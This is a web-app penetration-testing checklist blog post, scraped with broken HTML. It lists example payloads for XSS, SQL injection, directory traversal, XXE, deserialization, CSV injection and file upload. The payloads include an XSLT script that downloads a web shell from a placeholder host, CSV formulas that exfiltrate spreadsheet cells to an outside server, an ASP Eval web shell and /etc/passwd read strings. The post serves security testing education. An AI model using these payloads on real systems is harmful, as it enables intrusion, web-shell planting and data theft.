It’s always handy to have a good checklist when it comes to web app pen-testing. It’s even better to have some examples for each case \ud83d\ude42<\/p>\n
We’ll start with more “general” cases and then dig deeper into some obscure or language dependent attacks.<\/p>\n
XSS (Cross-site scripting)<\/strong><\/p>\n CSS(Cascading Style Sheet) injection<\/strong><\/p>\n Format string attack<\/strong><\/p>\n Directory traversal<\/strong><\/p>\n SQL injection<\/strong><\/p>\n SSJSI<\/strong><\/p>\n XXE (Xml eXternal Entity)<\/strong><\/p>\n XXE C# remote code execution<\/strong><\/p>\n Deserialization<\/strong><\/p>\n Expression Language Injection<\/strong><\/p>\n Insecure direct object access<\/strong><\/p>\n Open redirect<\/strong><\/p>\n HTTP content splitting<\/strong><\/p>\n CSRF (Cross-site request forgery)<\/strong><\/p>\n CORS (Cross-origin resource sharing)<\/strong><\/p>\n Check if tokens are removed at logout<\/strong><\/p>\n Change<\/strong> HTTP Referer<\/strong><\/p>\n Truncate file names<\/strong><\/p>\n CSV injection<\/strong><\/p>\n Code execution<\/strong><\/p>\n File upload<\/strong><\/p>\n XSS (Cross-site scripting)<\/strong><\/p>\n CSS (Cascading Style Sheet) injection<\/strong><\/p>\n When a CSS file is imported into the page, check for the absence of a leading “\/” character.<\/p>\n Here is an example:<\/p>\n More details here<\/a> and here<\/a>.<\/p>\n Format string attack<\/strong><\/p>\n Directory traversal<\/strong><\/p>\n SQL injection<\/strong><\/p>\n SSJS injection<\/strong><\/p>\n XXE (Xml eXternal Entity)<\/strong><\/p>\n XXE C# remote code execution<\/strong><\/span><\/p>\n More details here<\/a>.<\/p>\n Deserialization<\/strong><\/p>\n Java<\/p>\n This<\/a> is a great resource (and cheat sheet).<\/p>\n .NET:<\/p>\n You can find here<\/a> a basic C# example of a deserialization attack.<\/p>\n Usually the payloads will be base64 encoded.<\/p>\n More details here<\/a>\u00a0and here<\/a>.<\/p>\n Expression Language Injection<\/strong><\/p>\n More details here<\/a>.<\/p>\n Insecure direct object access<\/strong><\/p>\n If an object is referenced by an ID, check if you can access other objects that aren’t exposed (objects you aren’t supposed to have access to).<\/p>\n Open redirect<\/strong><\/p>\n This usually happens when one of the parameters in a form points to an URL.<\/p>\n Can be used to bypass some content filtering systems, especially if used in conjunction with an URL shortening service<\/a>.<\/p>\n HTTP content splitting<\/strong><\/p>\n Inject CR\/LF (\\r\\n) in the HTTP headers (for example if you control a cookie value).<\/p>\n More details here<\/a>.<\/p>\n CSRF (Cross-site request forgery)<\/strong><\/p>\n Check for the presence of tokens with random values in forms. Especially forms that will change a password, edit an address\/order\/.., etc.<\/p>\n CORS (Cross-origin resource sharing)<\/strong><\/p>\n Set the “Origin” in the HTTP header to a website you control. For example, it can be useful to steal CSRF tokens.<\/p>\n More details here<\/a>\u00a0and a great explanation here<\/a>.<\/p>\n Check if tokens are removed at logout<\/strong><\/p>\n Check if the tokens and cookies are still valid if you logoff. Use a proxy to get the cookies\/parameters and then iterate through them and check if they are still valid.<\/p>\n Change<\/strong> HTTP Referer<\/strong><\/p>\n Use a proxy (Burp\/ZAP\/etc) to intercept and change the\u00a0Referer\u00a0<\/strong>field. Look for errors.<\/p>\n Truncate file names<\/strong><\/p>\n Add %00 or %0D%0A when doing GET\/POST requests for files.<\/p>\n CSV injection<\/strong><\/p>\n Add something like one of the following in the fields in the csv file.<\/p>\n Code execution<\/strong><\/p>\n File upload<\/strong><\/p>\n If the page you’re testing allows users to upload files, you may want to test some of the following:<\/p>\n<\/h2>\n
Examples<\/h2>\n
<svg onload=alert(1)>\n<svg\/onload=alert(1)>\n<img src=x123 onerror=confirm(1)>\nonmousemove=\"prompt(1);\"\n\n<\/span><\/pre>\n<link href=\"styles.css\" ...\n<\/span><\/pre>\n%d%d%d\u2026\u2026%d\n%n%n%n\u2026\u2026%n\n%lf%lf%lf\u2026\u2026%lf\n%s%s%s\u2026\u2026%s\n%x%x%x\u2026\u2026%x<\/span><\/pre>\n..\/..\/ [...] \/etc\/ passwd\n..\/..\/ [...] \/windows\/ system.ini<\/span><\/pre>\n' or \"1\"='1\n\" or '1'=\"1\n\" OR SLEEP(5000) --\n' OR SLEEP(5000) --\n\" OR WAITFOR DELAY '00:00:05' --\n' OR WAITFOR DELAY '00:00:05' --\n...<\/span><\/pre>\nres.end('malwrforensics')\nres.end(require('fs').readFileSync('\/etc\/ passwd'))<\/span><\/pre>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE foo [ <!ELEMENT foo ANY >\n<!ENTITY xxe SYSTEM \"file:\/\/\/etc \/ passwd\" >]>\n<foo>&xxe;<\/foo>\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE foo [ <!ELEMENT foo ANY >\n<!ENTITY xxe SYSTEM \"expect:\/\/id\" >]>\n<creds><user>&xxe;<\/user>\n<pass>mypass<\/pass><\/creds>\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE foo [ <!ELEMENT foo ANY >\n<!ENTITY xxe SYSTEM \"http:\/\/malwrforensics.com\/scripts\/hex_to_bin.txt\" >]>\n<foo>&xxe;<\/foo><\/span><\/pre>\n<?xml version='1.0'?>\n<xsl:stylesheet version=\"1.0\"\nxmlns:xsl=\"http:\/\/www.w3.org\/1999\/XSL\/Transform\"\nxmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\nxmlns:user=\"http:\/\/test.com\/testnamespace\">\n<msxsl:script language=\"C#\" implements-prefix=\"user\">\n<![CDATA[\npublic string xml()\n{\n System.Net.WebClient webClient = new System.Net.WebClient();\n webClient.DownloadFile(\"https:\/\/x.x.x.x\/shell.aspx\",\n @\"c:\\inetpub\\wwwroot\\shell.aspx\");\n\n return \"It works!\";\n}\n]]>\n<\/msxsl:script>\n<xsl:template match=\"\/\">\n<xsl:value-of select=\"user:xml()\"\/>\n<\/xsl:template>\n<\/xsl:stylesheet><\/span>\n\nIf you don't have a webserver at your disposal, you can just check if it's working wiht a code like this:\n\n<xsl:stylesheet\u00a0version=\"1.0\"\u00a0\n\u00a0\u00a0\u00a0 xmlns:xsl=\"http:\/\/www.w3.org\/1999\/XSL\/Transform\"\u00a0\n\u00a0\u00a0\u00a0 xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\u00a0\n\u00a0\u00a0\u00a0 xmlns:user=\"http:\/\/example.com\/ns\">\u00a0\n<msxsl:script\u00a0language=\"C#\"\u00a0implements-prefix=\"user\">\u00a0\n\u00a0\u00a0\u00a0\u00a0<![CDATA[\u00a0\n\u00a0\u00a0\u00a0\u00a0public string Code()\u00a0\n\u00a0\u00a0\u00a0 {\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 return \"malwrforensics_token\";\u00a0\n\u00a0\u00a0\u00a0 }\u00a0\n\u00a0\u00a0\u00a0 ]]>\u00a0\n<\/msxsl:script>\u00a0\n<xsl:template\u00a0match=\"\/\">\u00a0\n\u00a0\u00a0\u00a0\u00a0<xsl:value-of\u00a0select=\"user:Code()\"\/>\u00a0\n<\/xsl:template>\u00a0\n<\/xsl:stylesheet>\n\n<\/span>(more details here<\/a>)<\/pre>\nAAEAAAD\/\/\/\/\/...<\/code><\/span><\/pre>\nT(java.lang.Runtime).getRuntime().exec(\u201ccalc.exe\u201d)<\/span><\/pre>\nExample: https:\/\/web.site\/downloadfile?id=12345\n<\/b>Check other objects with different IDs (..,12344, 12346,..)<\/span><\/pre>\nExample: https:\/\/web.site\/doCmd?id=1&url=http:\/\/web.site\/page\n<\/strong>You can change the url to point to another (phishing\/malicious) website.<\/span><\/pre>\ncurl -H \"http:\/\/malwrforensics.com\" http:\/\/<yourwebsite>\n\nCheck if you receive \n\"Access-Control-Allow-Origin: http:\/\/malwrforensics.com<\/em>\" or \n\"Access-Control-Allow-Origin: *<\/em>\"<\/span><\/pre>\n\"=1+1+cmd|' \/C calc'!A0\"\n\"=IMPORTXML(<\/span>\"http:\/\/web.server?p=\"<\/span>\", <\/span>\"\/\/a\"<\/span>)\"<\/span>\n\"=IMPORTXML(<\/span>\"http:\/\/web.server?p=\"<\/span>, <\/span>\"\/\/a\/@href\"<\/span>)\"<\/span>\n\n=<\/span>HYPERLINK<\/span>(<\/span>\"http:\/\/web.server?leak=\"<\/span>&<\/span>A1<\/span>&<\/span>A2<\/span>,\n<\/span>\"Error: please click here\"<\/span>) \nThis will show an error and when the user clicks on it, \nthe contents of A1 and A2 fields will be exfiltrated.<\/span><\/span><\/pre>\n; cat \/etc\/ passwd\n& dir c:<\/span><\/pre>\n\n
<html><body> < script > alert ( 'test' ); < \/ script><\/span><\/pre>\n\n
<%<\/span>\n label1.Text <\/span>=<\/span> \"<\/span>test<\/span>\"<\/span>;\n<\/span>%><\/span>\n<!<\/span>DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd\"<\/span>><\/span>\n<<\/span>html <\/span>xmlns<\/span>=\"http:\/\/www.w3.org\/1999\/xhtml\"<\/span> ><\/span>\n<<\/span>head <\/span>runat<\/span>=\"server\"<\/span>><\/span>\n <<\/span>title<\/span>><\/span>Test Page<\/span><\/<\/span>title<\/span>><\/span>\n<\/<\/span>head<\/span>><\/span>\n<<\/span>body<\/span>><\/span>\n <<\/span>form <\/span>id<\/span>=\"form1\"<\/span> runat<\/span>=\"server\"<\/span>><\/span>\n <<\/span>div<\/span>><\/span>\n <<\/span>asp:Label <\/span>runat<\/span>=\"server\"<\/span> id<\/span>=\"label1\"<\/span>><\/<\/span>asp:Label<\/span>><\/span>\n <\/<\/span>div<\/span>><\/span>\n <\/<\/span>form<\/span>><\/span>\n<\/<\/span>body<\/span>><\/span>\n<\/<\/span>html<\/span><\/span>><\/span>\n\nor\n\n<% Eval ( Request.QueryString ( \"cmd\" ) ) ; %>\n<\/span><\/span><\/pre>\n\n
Create a new office file, open\u00a0 the VBA editor and go to a function like Document_Open() and add the following code:\n\nMsgBox(\"test\")<\/span>\n\nor\n\nShell (\"calc.exe\", vbNormalFocus)<\/span><\/pre>\n\n
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n <!DOCTYPE foo [ \n <!ELEMENT foo ANY >\n <!ENTITY xxe SYSTEM \"file:\/\/\/ etc \/ passwd\" >]><foo>&xxe;<\/foo>\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM \"file:\/\/\/ c:\/ windows \/ system.ini\" >]><foo>&xxe;<\/foo>\n\n<\/span><\/pre>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n <!DOCTYPE foo [ \n <!ELEMENT foo ANY >\n <!ENTITY xxe SYSTEM \"http:\/\/malwrforensics.com\/en\/\" >]><foo>&xxe;<\/foo><\/span><\/pre>\n\n
< ? php echo ( \"test\" ); ? ><\/span>\n\nor\n\n